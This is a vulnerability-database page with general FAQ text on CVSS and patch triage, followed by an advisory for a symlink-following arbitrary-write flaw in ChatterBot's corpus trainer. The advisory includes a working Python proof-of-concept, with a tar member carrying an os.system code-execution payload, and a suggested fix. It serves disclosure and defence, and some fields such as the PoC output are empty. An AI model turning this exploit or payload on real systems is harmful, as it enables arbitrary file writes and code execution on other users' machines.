Q: How should we interpret CVSS severity scores?

CVSS (Common Vulnerability Scoring System) estimates technical severity, but it does not automatically equal business risk. Prioritize using context such as internet exposure, asset criticality, known exploitation (proof of concept or in the wild), and whether compensating controls exist. A Medium CVSS on an exposed production system can be more urgent than a Critical on an isolated non-production host.

Vulnerability Database

Q: What is a Vulnerability (CVE) and why does it matter?

A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.

Q: What's the difference between a vulnerability, an exploit, and a zero-day?

A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. Risk increases sharply when exploitation becomes reliable or widespread.

Q: Why do vulnerabilities keep reappearing in our environment?

Recurring findings usually come from incomplete asset discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called shadow IT) are another common reason the same issues resurface.

Q: How do we prioritize remediation without burning out the team?

Use a repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress so remediation is steady, not reactive.
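As a rough illustration of the triage model above, the following sketch ranks findings by how many context flags they carry and uses the CVSS score only as a tie-breaker. The `Finding` fields, the equal weighting of the flags, and the sample data are all assumptions made for the example, not part of any particular tool.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    """One vulnerability finding; every field name here is hypothetical."""
    name: str
    cvss: float               # CVSS base score, 0.0 to 10.0
    internet_exposed: bool    # reachable from the internet
    high_value_asset: bool    # identity, VPN, email, production
    known_exploit: bool       # public proof of concept or in-the-wild use
    rce_or_privesc: bool      # enables remote code execution or privilege escalation


def triage_key(finding: Finding) -> tuple:
    """Sort key: number of context flags first, CVSS score as tie-breaker."""
    flags = sum([
        finding.internet_exposed,
        finding.high_value_asset,
        finding.known_exploit,
        finding.rce_or_privesc,
    ])
    return (flags, finding.cvss)


def prioritize(findings: list[Finding]) -> list[Finding]:
    """Return findings ordered from most to least urgent."""
    return sorted(findings, key=triage_key, reverse=True)


# Made-up sample data: a Critical on an isolated host and a Medium on an exposed gateway.
findings = [
    Finding("critical-on-isolated-test-host", 9.8, False, False, False, True),
    Finding("medium-on-exposed-vpn-gateway", 5.5, True, True, True, False),
]
ordered = prioritize(findings)
```

With this weighting the exposed Medium sorts ahead of the isolated Critical. A real program would likely weight the flags differently and attach patch SLAs to each tier.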

Q: How can SynScan help reduce vulnerability risk over time?

SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.

Total vulnerabilities in the database: 352,374

ChatterBot: Symlink-Following Arbitrary Write via UbuntuCorpusTrainer — chatterbot

Time-of-check Time-of-use (TOCTOU) Race Condition

Summary

ChatterBot's UbuntuCorpusTrainer.extract() uses a predictable, home-rooted output directory (~/ubuntu_data/ubuntu_dialogs) with a check-then-create pattern (if not os.path.exists: os.makedirs) followed by tar.extractall(path=self.data_path). If a local attacker pre-plants a symlink at that path, os.path.exists() follows the symlink and returns True, so os.makedirs is skipped and the subsequent extractall writes the archive contents through the symlink into the attacker-chosen directory.

The existing safe_extract function validates tar member names (zip-slip defense) but does not validate the output directory itself, so it cannot detect that self.data_path is a symlink. That gap is what separates the insecure_fs_create_toctou family from the archive_extraction (zip-slip) family.

Vulnerability Details

Predictable output directory (lines 535-546)

home_directory = os.path.expanduser('~')
self.data_directory = kwargs.get(
    'ubuntu_corpus_data_directory',
    os.path.join(home_directory, 'ubuntu_data')   # ~/ubuntu_data (predictable)
)
self.data_path = os.path.join(
    self.data_directory, 'ubuntu_dialogs'          # ~/ubuntu_data/ubuntu_dialogs
)

Check-then-create (lines 621-622)

def extract(self, file_path: str):
    if not os.path.exists(self.data_path):   # ← follows symlink → True → skips makedirs
        os.makedirs(self.data_path)          # ← never reached if symlink exists
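
The effect of this check can be reproduced in isolation. The sketch below is illustrative only: it works inside a temporary directory, and the helper names `check_then_create` and `demo` are hypothetical stand-ins rather than ChatterBot code.

```python
import os
import shutil
import tempfile


def check_then_create(path: str) -> bool:
    """Mimic the check-then-create pattern; return True if makedirs ran."""
    if not os.path.exists(path):
        os.makedirs(path)
        return True
    return False


def demo() -> dict:
    """Plant a symlink at the output path and record how each check sees it."""
    base = tempfile.mkdtemp(prefix="demo_")
    try:
        target = os.path.join(base, "attacker_dir")   # stands in for the attacker's directory
        link = os.path.join(base, "ubuntu_dialogs")   # stands in for self.data_path
        os.mkdir(target)
        os.symlink(target, link)
        return {
            "exists": os.path.exists(link),             # follows the symlink
            "islink": os.path.islink(link),             # inspects the link itself
            "makedirs_ran": check_then_create(link),    # skipped because exists() is True
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)
```

Calling `demo()` shows that `os.path.exists()` reports the planted link as an existing path, while `os.path.islink()` is the call that reveals it is a link.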

Extraction through symlink (lines 633-644)

def safe_extract(tar, path='.', members=None, *, numeric_owner=False):
    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not is_within_directory(path, member_path):    # ← validates MEMBER names only
            raise Exception('Attempted Path Traversal in Tar File')
    tar.extractall(path, members, numeric_owner=numeric_owner)  # ← path is symlink → writes to target

safe_extract(tar, path=self.data_path, ...)   # self.data_path = symlink → attacker dir

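is_within_directory, which safe_extract calls for each member, applies os.path.abspath() to self.data_path. abspath only normalizes the path string and does not resolve symlinks, so the base stays the symlink path and the check never sees the attacker's target directory. Every clean-named member trivially passes is_within_directory because its path is built relative to that same base, and extractall then follows the symlink when it writes.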
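
To make the path handling concrete, the following sketch compares os.path.abspath() and os.path.realpath() on a symlinked directory and runs a member check modeled on the is_within_directory helper reproduced in the proof of concept. The directory names are throwaway stand-ins and `demo_paths` is a hypothetical helper.

```python
import os
import shutil
import tempfile


def is_within_directory(directory: str, target: str) -> bool:
    """Member check modeled on the helper shown in the proof of concept."""
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return os.path.commonprefix([abs_directory, abs_target]) == abs_directory


def demo_paths() -> dict:
    """Show what each path function reports for a symlinked output directory."""
    # realpath on the temp dir avoids surprises where the temp root is itself a symlink
    base = os.path.realpath(tempfile.mkdtemp(prefix="demo_"))
    try:
        target = os.path.join(base, "attacker_dir")
        link = os.path.join(base, "ubuntu_dialogs")
        os.mkdir(target)
        os.symlink(target, link)
        member_path = os.path.join(link, "config.py")
        return {
            "link": link,
            "target": target,
            "abspath_base": os.path.abspath(link),      # still the symlink path
            "realpath_base": os.path.realpath(link),    # the directory the link points to
            "check_passes": is_within_directory(link, member_path),
            "real_destination": os.path.realpath(member_path),
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)
```

The member check passes while the resolved destination lies under the link's target, which is the mismatch the advisory describes.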

Proof of Concept

Environment

| Component | Detail |
|-----------|--------|
| chatterbot | 1.2.13 (pip install) |
| Python | 3.11.0 |

Exploit

import io
import os
import shutil
import sys
import tarfile
import tempfile
from pathlib import Path

from chatterbot.trainers import UbuntuCorpusTrainer

# Directory the attacker wants the archive contents to land in
ATTACKER_TARGET = Path(tempfile.mkdtemp(prefix="pwned_"))


def is_within_directory(directory, target):
    """Mirror of the member-name check that safe_extract relies on."""
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    prefix = os.path.commonprefix([abs_directory, abs_target])
    return prefix == abs_directory


def main():
    # Temporary stand-in for the home directory, so the real ~/ubuntu_data is untouched
    test_base = Path(tempfile.mkdtemp(prefix="cb_exploit_"))
    data_dir = test_base / "ubuntu_data"
    data_path = data_dir / "ubuntu_dialogs"
    data_dir.mkdir(parents=True, exist_ok=True)

    # Step 1: pre-plant a symlink at the predictable output path
    os.symlink(str(ATTACKER_TARGET), str(data_path))
    print(f"[1] Symlink planted: {data_path} -> {ATTACKER_TARGET}")
    exists_check = os.path.exists(data_path)
    print(f"[2] os.path.exists(symlink) = {exists_check} (follows symlink → skips makedirs)")

    # Build an archive whose member names are clean (no path traversal)
    tar_path = test_base / "corpus.tar.gz"
    with tarfile.open(str(tar_path), "w:gz") as tf:
        info = tarfile.TarInfo(name="dialog_001.tsv")
        payload = b"2024-01-01\tuser1\t0\tARBITRARY_CONTENT_VIA_SYMLINK\n"
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))

        info2 = tarfile.TarInfo(name="config.py")
        rce = b"import os; os.system('id > /tmp/chatterbot_rce')\n"
        info2.size = len(rce)
        tf.addfile(info2, io.BytesIO(rce))

    # Same check-then-create as extract(): skipped because the symlink "exists"
    if not os.path.exists(data_path):
        os.makedirs(data_path)

    # Same member validation and extraction as safe_extract()
    with tarfile.open(str(tar_path), "r:gz") as tar:
        for member in tar.getmembers():
            member_path = os.path.join(str(data_path), member.name)
            if not is_within_directory(str(data_path), member_path):
                raise Exception("Attempted Path Traversal in Tar File")
        tar.extractall(str(data_path))

    print("[3] extractall(data_path): data_path is symlink, writes to target")

    # Verify that the files landed in the attacker's directory
    files = list(ATTACKER_TARGET.iterdir())
    if files:
        print(f"\n[+] EXPLOIT SUCCESSFUL: {len(files)} files in attacker directory:")
        for f in sorted(files):
            print(f"    {f.name}: {f.read_text().strip()[:60]}")
    else:
        print("[-] Failed")

    # Clean up both temporary trees, then exit 0 on success or 1 on failure
    shutil.rmtree(str(test_base), ignore_errors=True)
    shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
    sys.exit(0 if files else 1)


if __name__ == "__main__":
    print(f"chatterbot installed: {UbuntuCorpusTrainer.__module__}")
    print(f"Attacker target: {ATTACKER_TARGET}")
    print()
    main()

PoC output

Suggested Fix

Refuse symlinks on the output directory before extraction:

def extract(self, file_path: str):
    if os.path.islink(self.data_path):
        raise self.TrainerInitializationException(
            f'Refusing to extract to symlink: {self.data_path}')
    if not os.path.exists(self.data_path):
        os.makedirs(self.data_path)
    ...
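
A possible hardening, offered as a sketch rather than the project's actual patch: create the directory with os.mkdir(), which fails if anything already exists at the path, and inspect a pre-existing entry with os.lstat(), which does not follow symlinks. The function names `ensure_real_directory` and `can_extract_into` are hypothetical, the ownership check assumes a POSIX system, and parent path components are not validated here.

```python
import os
import stat
import tempfile


def ensure_real_directory(path: str) -> None:
    """Make sure path is a real directory owned by the current user, or raise OSError."""
    # Assumption: parent components are trusted; this sketch does not check them.
    os.makedirs(os.path.dirname(path) or ".", exist_ok=True)
    try:
        os.mkdir(path, mode=0o700)   # raises FileExistsError if anything is already there
        return
    except FileExistsError:
        pass
    info = os.lstat(path)            # lstat describes the entry itself, not a link target
    if stat.S_ISLNK(info.st_mode):
        raise OSError(f"Refusing to extract to symlink: {path}")
    if not stat.S_ISDIR(info.st_mode):
        raise OSError(f"Not a directory: {path}")
    if info.st_uid != os.getuid():   # POSIX only
        raise OSError(f"Directory not owned by current user: {path}")


def can_extract_into(path: str) -> bool:
    """Return True if path passed the checks, False if it was refused."""
    try:
        ensure_real_directory(path)
        return True
    except OSError:
        return False


# Usage with throwaway paths: a fresh directory is accepted, a planted symlink is refused.
base = tempfile.mkdtemp(prefix="demo_")
fresh = os.path.join(base, "ubuntu_dialogs")
planted = os.path.join(base, "planted_link")
os.symlink(base, planted)
fresh_ok = can_extract_into(fresh)
planted_ok = can_extract_into(planted)
```

This narrows the window but does not remove it entirely, since the path could still be swapped between the check and the extraction if another user can write to the parent directory.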

Published: Jun 19, 2026
Updated: Jun 20, 2026
GHSA: GHSA-wvrh-2f4m-924v
Severity: Medium
Exploit:
CISA KEV:

CVSS v3:

Severity: Medium
Score: 5.5
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
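
For readers who want to check how the vector maps to the score, here is a minimal sketch of the base-score arithmetic, assuming the CVSS v3.1 formulas and metric weights (the listing above says only "v3"). The function and constant names are illustrative.

```python
import math

# Metric weights from the CVSS v3.1 specification
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place using the integer method from the v3.1 spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a vector such as 'AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'."""
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    iss = 1 - (
        (1 - WEIGHTS["C"][m["C"]])
        * (1 - WEIGHTS["I"][m["I"]])
        * (1 - WEIGHTS["A"][m["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


score = base_score("AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N")
```

For this vector the impact term is about 3.60 and the exploitability term about 1.83, which rounds up to the listed 5.5.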

CWEs:

Affected Software

Software	From	Fixed in
chatterbot	-	1.2.14

References

https://github.com/gunthercox/ChatterBot/security/advisories/GHSA-wvrh-2f4m-924v

